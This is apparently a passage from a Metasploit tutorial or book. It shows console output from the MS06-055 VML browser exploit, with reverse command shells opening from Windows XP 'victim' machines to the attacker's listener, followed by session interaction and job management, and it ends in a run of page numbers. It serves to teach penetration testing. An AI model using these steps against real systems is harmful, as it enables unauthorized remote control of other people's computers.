[*] Command shell session 4 opened (192.168.1.113:4444 -> 192.168.1.220:1044)
Aha! We have our first victim!
msf exploit(ms06_055_vml_method) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
4 Command shell 192.168.1.113:4444 -> 192.168.1.220:1044
msf exploit(ms06_055_vml_method) > sessions -i 4
[*] Starting interaction with 4...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\SAFE_NT\Profiles\jness\Desktop>echo woot!
echo woot!
woot!
D:\SAFE_NT\Profiles\jness\Desktop>
Pressing CTRL-Z will return you from the session back to the Metasploit console
prompt. Let??™s simulate a second incoming connection:
msf exploit(ms06_055_vml_method) > [*] Command shell session 5 opened
(192.168.1.113:4444 -> 192.168.1.230:1159)
sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
4 Command shell 192.168.1.113:4444 -> 192.168.1.220:1044
5 Command shell 192.168.1.113:4444 -> 192.168.1.230:1159
The jobs command will list the exploit jobs you have going on currently:
msf exploit(ms06_055_vml_method) > jobs
Id Name
-- ----
3 Exploit: windows/browser/ms06_055_vml_method
msf exploit(ms06_055_vml_method) > jobs -K
Stopping all jobs.
Pages:
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223